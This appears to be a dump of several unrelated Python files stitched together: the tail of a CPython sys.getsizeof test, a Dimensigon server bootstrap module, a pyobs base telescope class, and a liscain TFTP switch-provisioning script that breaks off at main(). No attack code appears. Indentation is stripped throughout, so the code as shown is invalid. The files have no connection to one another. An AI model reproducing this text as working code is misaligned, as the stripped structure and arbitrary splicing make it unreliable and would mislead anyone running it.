sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2nQ') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2nQ') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# Ellipsis
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('5P2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('13P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPPnPnPnP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPPP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0PQ") + 8 + 5*calcsize("n2P") + calcsize("PPPP"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0PQ") + 16 + 10*calcsize("n2P") + calcsize("PPPP"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
if __name__ == "__main__":
unittest.main()
|
core.py
|
import logging
import multiprocessing as mp
import os
import time
import typing as t
from gunicorn.app.base import Application
from gunicorn.pidfile import Pidfile
from dimensigon import defaults
from dimensigon.exceptions import DimensigonError
from dimensigon.use_cases.base import TerminateInterrupt
from dimensigon.use_cases.catalog import CatalogManager
from dimensigon.use_cases.cluster import ClusterManager
from dimensigon.use_cases.file_sync import FileSync
# from dimensigon.use_cases.log_sender import LogSender
from dimensigon.use_cases.mptools import MainContext
from dimensigon.use_cases.mptools_events import EventMessage
from dimensigon.use_cases.routing import RouteManager
from dimensigon.utils.typos import Id
from dimensigon.web import DimensigonFlask, create_app, threading
_logger = logging.getLogger("dm")
def _sleep_secs(max_sleep, end_time=999999999999999.9):
# Calculate time left to sleep, no less than 0
return max(0.0, min(end_time - time.time(), max_sleep))
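# For illustration (values are made up): the helper returns whichever bound is
# tighter and never goes negative, e.g.
#   _sleep_secs(5.0, end_time=time.time() + 2.0)  -> roughly 2.0
#   _sleep_secs(5.0, end_time=time.time() - 1.0)  -> 0.0
#   _sleep_secs(0.5)                              -> 0.5 (default end_time is far in the future)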
class GunicornApp(Application):
dm = None
def __init__(self, application, options=None):
""" Construct the Application. Default gUnicorn configuration is loaded """
self.application = application
self.options = options or {}
self.process = None
# if port or host isn't set, fall back to the values from os.environ
#
super(GunicornApp, self).__init__()
def init(self, parser, opts, args):
pass
def load_config(self):
# Load up the any app specific configuration
for k, v in self.options.items():
self.cfg.set(k.lower(), v)
def load(self):
return self.application
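# Usage sketch (hypothetical option values; in this project the options come from
# Config.http_conf and the instance is built in Dimensigon.create_gunicorn_instance):
#
#   app = GunicornApp(flask_app, options={'bind': '0.0.0.0:8000', 'workers': 2})
#   app.run()  # load_config() copies each option into gunicorn's cfg before serving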
class Dimensigon:
def __init__(self):
self.flask_app: t.Optional[DimensigonFlask] = None
self.gunicorn: t.Optional[GunicornApp] = None
self.server: t.Optional[mp.Process] = None
self.config = Config(self)
# processes
self.manager = mp.Manager() # shared memory between processes
self.cluster_manager: t.Optional[ClusterManager] = None
self.file_sync: t.Optional[FileSync] = None
self.route_manager: t.Optional[RouteManager] = None
self.catalog_manager: t.Optional[CatalogManager] = None
self.STOP_WAIT_SECS = 90
self.engine = None # set on setup_dm function
self.get_session = None # set on setup_dm function
self._main_ctx = MainContext()
self.server_id: t.Optional[Id] = None
self.pid = None
self.pidfile = None
def create_flask_instance(self):
if self.flask_app is None:
self.flask_app = create_app(self.config.flask_conf)
self.flask_app.dm = self
def create_gunicorn_instance(self):
if self.gunicorn is None:
self.gunicorn = GunicornApp(self.flask_app, self.config.http_conf)
self.gunicorn.dm = self
def set_catalog_manager(self):
if self.catalog_manager is None:
self.catalog_manager = CatalogManager(None, None, None, None, None, self)
def create_processes(self):
self.cluster_manager = self._main_ctx.Proc(ClusterManager, self)
self.cluster_manager.SHUTDOWN_WAIT_SECS = 90
self.route_manager = self._main_ctx.Proc(RouteManager, self)
self.file_sync = self._main_ctx.Proc(FileSync, self)
self.catalog_manager = self._main_ctx.Thread(CatalogManager, self)
# self.log_sender = LogSender(self) # log sender embedded in file_sync process
if self.config.flask:
self.http_server = mp.Process(target=self.flask_app.run, name="Flask server",
kwargs=dict(host='0.0.0.0', port=defaults.DEFAULT_PORT, ssl_context='adhoc'))
else:
self.http_server = mp.Process(target=self.gunicorn.run, name="Gunicorn server")
def bootstrap(self):
self.create_flask_instance()
self.create_gunicorn_instance()
self.create_processes()
def make_first_request(self):
from dimensigon.domain.entities import Server
import dimensigon.web.network as ntwrk
with self.flask_app.app_context():
start = time.time()
while True:
resp = ntwrk.get(Server.get_current(), 'root.home', timeout=1)
if not resp.ok and time.time() - start < 30:
time.sleep(0.5)
else:
break
self._main_ctx.publish_q.safe_put(EventMessage("Listening", source="Dimensigon"))
def start_server(self):
# if hasattr(self.cluster_manager, 'notify_cluster'):
# self.flask_app.before_first_request(self.cluster_manager.notify_cluster)
th = threading.Timer(interval=4, function=self.make_first_request)
th.start()
self.http_server.start()
def start(self):
"""starts dimensigon server"""
_logger.info(f"Starting Dimensigon ({os.getpid()})")
self._main_ctx.init_signals()
self.pid = os.getpid()
pidname = self.config.pidfile
self.pidfile = Pidfile(pidname)
self.pidfile.create(self.pid)
self.bootstrap()
self.flask_app.bootstrap()
# self.cluster_manager.start()
# self.file_sync.start()
# self.log_sender.start() # log sender embedded in file_sync process
self.start_server()
try:
while not self._main_ctx.shutdown_event.is_set():
self._main_ctx.forward_events()
except (TerminateInterrupt, KeyboardInterrupt):
pass
self.shutdown()
def shutdown(self):
_logger.info(f"Shutting down Dimensigon")
self.http_server.terminate()
self.http_server.terminate()
self.http_server.join(90)
if self.http_server.is_alive():
self.http_server.kill()
self._main_ctx.stop()
class Config:
def __init__(self, dm: Dimensigon):
self.dm = dm
# Directory that holds the configuration
self.config_dir: t.Optional[str] = None
# If set, process should upgrade as soon as a neighbour has a higher version
self.auto_upgrade: bool = True
# sets a security layer on top of HTTP
self.security_layer: bool = True
# allow requests to bypass the security layer unencrypted when the 'D-Securizer: plain' header is set
self.security_layer_antidote: bool = False
# pidfile name
self.pidfile: str = None
# runs the scheduler
self.scheduler: bool = True
# database uri
self.db_uri: t.Optional[str] = None
# http configuration
self.http_conf = {}
# flask configuration
self.flask_conf = {}
# Run configuration (used for elevator to load same configuration)
self.run_config = {}
self.debug: bool = False
self.flask: bool = False
# forces the process to scan on startup
self.force_scan: bool = False
# Run route table, catalog and cluster refresh at a regular interval (in minutes)
# self.refresh_interval: dt.timedelta = defaults.
def path(self, *path: str) -> str:
"""Generate path to the file within the configuration directory.
"""
if self.config_dir is None:
raise DimensigonError("config_dir is not set")
return os.path.join(self.config_dir, *path)
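# Example (hypothetical directory): with config.config_dir = '/etc/dimensigon',
# config.path('ssl', 'cert.pem') returns '/etc/dimensigon/ssl/cert.pem';
# calling path() before config_dir is set raises DimensigonError.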
|
basetelescope.py
|
import threading
from typing import Dict, Any, Tuple, Union, List
from astropy.coordinates import SkyCoord, ICRS, AltAz
import astropy.units as u
import logging
from pyobs.interfaces import ITelescope, IFitsHeaderProvider
from pyobs.modules import Module
from pyobs.mixins import MotionStatusMixin, WeatherAwareMixin, WaitForMotionMixin
from pyobs.modules import timeout
from pyobs.utils.enums import MotionStatus
from pyobs.utils.threads import LockWithAbort
from pyobs.utils.time import Time
log = logging.getLogger(__name__)
class BaseTelescope(WeatherAwareMixin, MotionStatusMixin, WaitForMotionMixin, ITelescope, IFitsHeaderProvider, Module):
"""Base class for telescopes."""
__module__ = 'pyobs.modules.telescope'
def __init__(self, fits_headers: dict = None, min_altitude: float = 10, wait_for_dome: str = None, *args, **kwargs):
"""Initialize a new base telescope.
Args:
fits_headers: Additional FITS headers to send.
min_altitude: Minimal altitude for telescope.
wait_for_dome: Name of dome module to wait for.
"""
Module.__init__(self, *args, **kwargs)
# store
self._fits_headers = fits_headers if fits_headers is not None else {}
self._min_altitude = min_altitude
# some multi-threading stuff
self._lock_moving = threading.Lock()
self._abort_move = threading.Event()
# celestial status
self._celestial_lock = threading.RLock()
self._celestial_headers: Dict[str, Any] = {}
# add thread func
self.add_thread_func(self._celestial, True)
# init mixins
WeatherAwareMixin.__init__(self, *args, **kwargs)
MotionStatusMixin.__init__(self, *args, **kwargs)
WaitForMotionMixin.__init__(self,
wait_for_modules=None if wait_for_dome is None else [wait_for_dome],
wait_for_timeout=60000,
wait_for_states=[MotionStatus.POSITIONED, MotionStatus.TRACKING])
def open(self):
"""Open module."""
Module.open(self)
# open mixins
WeatherAwareMixin.open(self)
MotionStatusMixin.open(self)
def init(self, *args, **kwargs):
"""Initialize telescope.
Raises:
ValueError: If telescope could not be initialized.
"""
raise NotImplementedError
def park(self, *args, **kwargs):
"""Park telescope.
Raises:
ValueError: If telescope could not be parked.
"""
raise NotImplementedError
def _move_radec(self, ra: float, dec: float, abort_event: threading.Event):
"""Actually starts tracking on given coordinates. Must be implemented by derived classes.
Args:
ra: RA in deg to track.
dec: Dec in deg to track.
abort_event: Event that gets triggered when movement should be aborted.
Raises:
Exception: On any error.
"""
raise NotImplementedError
@timeout(1200)
def move_radec(self, ra: float, dec: float, track: bool = True, *args, **kwargs):
"""Starts tracking on given coordinates.
Args:
ra: RA in deg to track.
dec: Dec in deg to track.
track: Whether the device should start tracking on the given coordinates.
Raises:
ValueError: If device could not track.
"""
# check observer
if self.observer is None:
raise ValueError('No observer given.')
# to alt/az
ra_dec = SkyCoord(ra * u.deg, dec * u.deg, frame=ICRS)
alt_az = self.observer.altaz(Time.now(), ra_dec)
# check altitude
if alt_az.alt.degree < self._min_altitude:
raise ValueError('Destination altitude below limit.')
# acquire lock
with LockWithAbort(self._lock_moving, self._abort_move):
# log and event
self._change_motion_status(MotionStatus.SLEWING)
log.info("Moving telescope to RA=%s (%.5f°), Dec=%s (%.5f°)...",
ra_dec.ra.to_string(sep=':', unit=u.hour, pad=True), ra,
ra_dec.dec.to_string(sep=':', unit=u.deg, pad=True), dec)
# track telescope
self._move_radec(ra, dec, abort_event=self._abort_move)
log.info('Reached destination')
# move dome, if exists
self._wait_for_motion(self._abort_move)
# finish slewing
self._change_motion_status(MotionStatus.TRACKING)
# update headers now
threading.Thread(target=self._update_celestial_headers).start()
log.info('Finished moving telescope.')
def _move_altaz(self, alt: float, az: float, abort_event: threading.Event):
"""Actually moves to given coordinates. Must be implemented by derived classes.
Args:
alt: Alt in deg to move to.
az: Az in deg to move to.
abort_event: Event that gets triggered when movement should be aborted.
Raises:
Exception: On error.
"""
raise NotImplementedError
@timeout(1200)
def move_altaz(self, alt: float, az: float, *args, **kwargs):
"""Moves to given coordinates.
Args:
alt: Alt in deg to move to.
az: Az in deg to move to.
Raises:
Exception: On error.
AcquireLockFailed: If current motion could not be aborted.
"""
# check altitude
if alt < self._min_altitude:
raise ValueError('Destination altitude below limit.')
# acquire lock
with LockWithAbort(self._lock_moving, self._abort_move):
# log and event
log.info("Moving telescope to Alt=%.2f°, Az=%.2f°...", alt, az)
self._change_motion_status(MotionStatus.SLEWING)
# move telescope
self._move_altaz(alt, az, abort_event=self._abort_move)
log.info('Reached destination')
# move dome, if exists
self._wait_for_motion(self._abort_move)
# finish slewing
self._change_motion_status(MotionStatus.POSITIONED)
# update headers now
threading.Thread(target=self._update_celestial_headers).start()
log.info('Finished moving telescope.')
def get_fits_headers(self, namespaces: List[str] = None, *args, **kwargs) -> Dict[str, Tuple[Any, str]]:
"""Returns FITS header for the current status of this module.
Args:
namespaces: If given, only return FITS headers for the given namespaces.
Returns:
Dictionary containing FITS headers.
"""
# define base header
hdr: Dict[str, Union[Any, Tuple[Any, str]]] = {}
# positions
try:
ra, dec = self.get_radec()
coords_ra_dec = SkyCoord(ra=ra * u.deg, dec=dec * u.deg, frame=ICRS)
alt, az = self.get_altaz()
coords_alt_az = SkyCoord(alt=alt * u.deg, az=az * u.deg, frame=AltAz)
except Exception as e:
log.warning('Could not fetch telescope position: %s', e)
coords_ra_dec, coords_alt_az = None, None
# set coordinate headers
if coords_ra_dec is not None:
hdr['TEL-RA'] = (float(coords_ra_dec.ra.degree), 'Right ascension of telescope [degrees]')
hdr['TEL-DEC'] = (float(coords_ra_dec.dec.degree), 'Declination of telescope [degrees]')
hdr['CRVAL1'] = hdr['TEL-RA']
hdr['CRVAL2'] = hdr['TEL-DEC']
if coords_alt_az is not None:
hdr['TEL-ALT'] = (float(coords_alt_az.alt.degree), 'Telescope altitude [degrees]')
hdr['TEL-AZ'] = (float(coords_alt_az.az.degree), 'Telescope azimuth [degrees]')
hdr['TEL-ZD'] = (90. - hdr['TEL-ALT'][0], 'Telescope zenith distance [degrees]')
hdr['AIRMASS'] = (float(coords_alt_az.secz.value), 'Airmass of observation start')
# convert to sexagesimal
if coords_ra_dec is not None:
hdr['RA'] = (str(coords_ra_dec.ra.to_string(sep=':', unit=u.hour, pad=True)), 'Right ascension of object')
hdr['DEC'] = (str(coords_ra_dec.dec.to_string(sep=':', unit=u.deg, pad=True)), 'Declination of object')
# site location
if self.observer is not None:
hdr['LATITUDE'] = (float(self.observer.location.lat.degree), 'Latitude of telescope [deg N]')
hdr['LONGITUD'] = (float(self.observer.location.lon.degree), 'Longitude of telescope [deg E]')
hdr['HEIGHT'] = (float(self.observer.location.height.value), 'Altitude of telescope [m]')
# add static fits headers
for key, value in self._fits_headers.items():
hdr[key] = tuple(value)
# add celestial headers
for key, value in self._celestial_headers.items():
hdr[key] = tuple(value)
# finish
return hdr
def _celestial(self):
"""Thread for continuously calculating positions and distances to celestial objects like moon and sun."""
# wait a little
self.closing.wait(10)
# run until closing
while not self.closing.is_set():
# update headers
self._update_celestial_headers()
# sleep a little
self.closing.wait(30)
def _update_celestial_headers(self):
"""Calculate positions and distances to celestial objects like moon and sun."""
# get now
now = Time.now()
# get telescope alt/az
try:
alt, az = self.get_altaz()
tel_altaz = SkyCoord(alt=alt * u.deg, az=az * u.deg, frame='altaz')
except Exception:
alt, az, tel_altaz = None, None, None
# get current moon and sun information
moon_altaz = self.observer.moon_altaz(now)
moon_frac = self.observer.moon_illumination(now)
sun_altaz = self.observer.sun_altaz(now)
# calculate distance to telescope
moon_dist = tel_altaz.separation(moon_altaz) if tel_altaz is not None else None
sun_dist = tel_altaz.separation(sun_altaz) if tel_altaz is not None else None
# store it
with self._celestial_lock:
self._celestial_headers = {
'MOONALT': (float(moon_altaz.alt.degree), 'Lunar altitude'),
'MOONFRAC': (float(moon_frac), 'Fraction of the moon illuminated'),
'MOONDIST': (None if moon_dist is None else float(moon_dist.degree), 'Lunar distance from target'),
'SUNALT': (float(sun_altaz.alt.degree), 'Solar altitude'),
'SUNDIST': (None if sun_dist is None else float(sun_dist.degree), 'Solar distance from target')
}
__all__ = ['BaseTelescope']
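# Sketch of a minimal concrete subclass (names and bodies are illustrative only; real
# drivers live elsewhere). Only the abstract hooks need to be filled in, while altitude
# checks, locking, motion events and FITS headers come from BaseTelescope; a usable
# subclass would also provide get_radec()/get_altaz(), which get_fits_headers() calls:
#
#   class DummyTelescope(BaseTelescope):
#       def init(self, *args, **kwargs):
#           pass  # initialize hardware, then update the motion status
#       def park(self, *args, **kwargs):
#           pass  # move to the park position, then update the motion status
#       def _move_radec(self, ra, dec, abort_event):
#           pass  # drive the mount to ra/dec, honouring abort_event
#       def _move_altaz(self, alt, az, abort_event):
#           pass  # drive the mount to alt/az, honouring abort_event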
|
liscain.py
|
import tftpy
import logging
import ipaddress
import threading
import lib.db
import sqlalchemy.orm
import tasks
from sqlalchemy import and_
from devices import remap_to_subclass
from devices.device import Device
from devices.ciscoios import CiscoIOS
from io import StringIO
from lib.config import config
from lib.switchstate import SwitchState
from lib.option82 import Option82
from lib.commander import Commander
import zmq
logging.basicConfig(
level=logging.INFO,
format='%(asctime)-15s %(levelname)-8s %(name)-16s %(message)s'
)
logger = logging.getLogger('lis-cain')
logger.setLevel(logging.INFO)
logging.getLogger('tftpy.TftpServer').setLevel(logging.CRITICAL)
logging.getLogger('tftpy.TftpPacketTypes').setLevel(logging.CRITICAL)
logging.getLogger('tftpy.TftpStates').setLevel(logging.CRITICAL)
commander: Commander = Commander()
commander.start()
option82_controller: lib.option82.Option82 = lib.option82.Option82(commander)
def serve_file(name: str, **kwargs) -> StringIO:
global commander
global option82_controller
remote_address: str = kwargs['raddress']
remote_id: str = 'lc-{:02x}'.format(int(ipaddress.ip_address(remote_address)))
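# e.g. a request from 10.0.0.5: int(ipaddress.ip_address('10.0.0.5')) == 167772165
# == 0xa000005, so the derived identifier is 'lc-a000005'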
if name in ['network-confg']:
device = None
with lib.db.sql_ses() as ses:
try:
device = ses.query(CiscoIOS).filter(
and_(
CiscoIOS.identifier == remote_id,
CiscoIOS.state != SwitchState.CONFIGURED
)
).one()
except sqlalchemy.orm.exc.NoResultFound:
device = CiscoIOS()
device.initialize(identifier=remote_id, address=remote_address)
ses.add(device)
ses.commit()
ses.refresh(device)
try:
task = tasks.DeviceInitializationTask(device)
if config.get('liscain', 'autoconf_enabled') == 'yes':
task.hook(SwitchState.READY, option82_controller.autoadopt)
commander.enqueue(device, task)
except KeyError as e:
logger.error('init/%s: %s', remote_id, e)
return device.emit_base_config()
else:
logger.debug('%s requested %s, ignoring', remote_id, name)
return StringIO()
def tftp_server():
srv = tftpy.TftpServer(tftproot='c:/tmp', dyn_file_func=serve_file)
srv.listen()
def handle_msg(message):
global option82_controller
cmd = message.get('cmd', None)
if cmd == 'list':
ret = []
with lib.db.sql_ses() as ses:
devices = ses.query(Device).all()
for device in devices:
queued_commands = len(commander.get_queue_list(device))
device_dict = device.as_dict()
device_dict['cqueue'] = queued_commands
ret.append(device_dict)
return ret
elif cmd == 'neighbor-info':
device_id = message.get('id', None)
if device_id is None:
return {'error': 'missing device id'}
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
remap_to_subclass(device)
return {'info': device.neighbor_info()}
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
elif cmd == 'delete':
device_id = message.get('id', None)
if device_id is None:
return {'error': 'missing device id'}
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
ses.delete(device)
ses.commit()
return {'info': 'device deleted'}
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
elif cmd == 'status':
device_id = message.get('id', None)
if device_id is None:
return {'error': 'missing device id'}
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
queued_commands = commander.get_queue_list(device)
device_dict = device.as_dict()
device_dict['cqueue'] = len(queued_commands)
device_dict['cqueue_items'] = queued_commands
return device_dict
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
elif cmd == 'adopt':
device_id = message.get('id', None)
switch_config = message.get('config', None)
identity = message.get('identity', None)
if device_id is None:
return {'error': 'missing device id'}
if switch_config is None:
return {'error': 'missing config'}
if identity is None:
return {'error': 'missing identity'}
device = None
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
remap_to_subclass(device)
try:
commander.enqueue(
device,
tasks.DeviceConfigurationTask(device, identity=identity, configuration=switch_config)
)
return {'info': 'ok'}
except BaseException as e:
return {'error': str(e)}
elif cmd == 'reinit':
device_id = message.get('id', None)
if device_id is None:
return {'error': 'missing device id'}
device = None
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
remap_to_subclass(device)
try:
task = tasks.DeviceInitializationTask(device)
if config.get('liscain', 'autoconf_enabled') == 'yes':
task.hook(SwitchState.READY, option82_controller.autoadopt)
commander.enqueue(
device,
task
)
return {'info': 'ok'}
except BaseException as e:
return {'error': str(e)}
elif cmd == 'opt82-info':
upstream_switch_mac = message.get('upstream_switch_mac', None)
upstream_port_info = message.get('upstream_port_info', None)
downstream_switch_name = message.get('downstream_switch_name', None)
if upstream_switch_mac is None:
return {'error': 'missing upstream switch mac'}
if upstream_port_info is None:
return {'error': 'missing upstream port info'}
info = option82_controller.set_association(upstream_switch_mac, upstream_port_info, downstream_switch_name)
return info
elif cmd == 'opt82-list':
opt82_items = []
with lib.db.sql_ses() as ses:
for option82_item in ses.query(lib.option82.Option82Info).all():
opt82_items.append(option82_item.as_dict())
return opt82_items
elif cmd == 'opt82-delete':
item_id = message.get('id', None)
if item_id is None:
return {'error': 'missing opt82 item id'}
with lib.db.sql_ses() as ses:
try:
opt82_item = ses.query(lib.option82.Option82Info).filter(lib.option82.Option82Info.id == item_id).one()
ses.delete(opt82_item)
ses.commit()
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'option82 item not found'}
return {'info': 'option82 info deleted'}
return {'error': 'unknown command'}
def main():
global option82_controller
